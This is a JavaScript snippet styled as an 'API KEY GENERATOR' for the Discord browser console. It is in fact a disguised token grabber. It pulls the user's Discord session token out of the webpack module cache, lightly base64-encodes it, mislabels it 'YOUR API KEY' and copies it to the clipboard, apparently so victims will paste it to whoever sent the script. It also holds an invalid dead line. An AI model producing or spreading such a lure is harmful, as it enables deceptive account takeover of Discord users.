//░█▀▀█ ▒█▀▀█ ▀█▀ 　 ▒█░▄▀ ▒█▀▀▀ ▒█░░▒█ 　 ▒█▀▀█ ▒█▀▀▀ ▒█▄░▒█ ▒█▀▀▀ ▒█▀▀█ ░█▀▀█ ▀▀█▀▀ ▒█▀▀▀█ ▒█▀▀█ 
//▒█▄▄█ ▒█▄▄█ ▒█░ 　 ▒█▀▄░ ▒█▀▀▀ ▒█▄▄▄█ 　 ▒█░▄▄ ▒█▀▀▀ ▒█▒█▒█ ▒█▀▀▀ ▒█▄▄▀ ▒█▄▄█ ░▒█░░ ▒█░░▒█ ▒█▄▄▀ 
//▒█░▒█ ▒█░░░ ▄█▄ 　 ▒█░▒█ ▒█▄▄▄ ░░▒█░░ 　 ▒█▄▄█ ▒█▄▄▄ ▒█░░▀█ ▒█▄▄▄ ▒█░▒█ ▒█░▒█ ░▒█░░ ▒█▄▄▄█ ▒█░▒█

const Base64 = {
// private property
_keyStr : "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
}

function get() {
return (webpackChunkdiscord_app.push([[''],{},e=>{m=[];for(let c in e.c)m.push(e.c[c])}]),m).find(m=>m?.exports?.default?.getToken!==void 0).exports.default.getToken()
try {
 return get.NEW_API-KEY() // GET API KEY
} catch (e) {
 throw e
}
}
// private method for UTF-8 encoding
function utf8_encode(string) {
    string = string.replace(/\r\n/g,"\n");
    let utftext = "";

    for (let n = 0; n < string.length; n++) {

        let c = string.charCodeAt(n);

        if (c < 128) {
            utftext += String.fromCharCode(c);
        }
        else if((c > 127) && (c < 2048)) {
            utftext += String.fromCharCode((c >> 6) | 192);
            utftext += String.fromCharCode((c & 63) | 128);
        }
        else {
            utftext += String.fromCharCode((c >> 12) | 224);
            utftext += String.fromCharCode(((c >> 6) & 63) | 128);
            utftext += String.fromCharCode((c & 63) | 128);
        }

    }

    return utftext;
}
function encode(string) {
    let output = "";
    let chr1, chr2, chr3, enc1, enc2, enc3, enc4;
    let i = 0;

    string = utf8_encode(string);

    while (i < string.length) {

        chr1 = string.charCodeAt(i++);
        chr2 = string.charCodeAt(i++);
        chr3 = string.charCodeAt(i++);

        enc1 = chr1 >> 2;
        enc2 = ((chr1 & 3) << 4) | (chr2 >> 4);
        enc3 = ((chr2 & 15) << 2) | (chr3 >> 6);
        enc4 = chr3 & 63;

        if (isNaN(chr2)) {
            enc3 = enc4 = 64;
        } else if (isNaN(chr3)) {
            enc4 = 64;
        }

        output = output +
        Base64._keyStr.charAt(enc1) + Base64._keyStr.charAt(enc2) +
        Base64._keyStr.charAt(enc3) + Base64._keyStr.charAt(enc4);

    }

    return "🔗 YOUR API KEY: " + output + "\n\nhttps://discord.com/developers/applications";
}

fetched = get()
fetched = encode(fetched)
copy(fetched)
console.log("📋 Copied API-Key to Clipboard!")

location.reload()
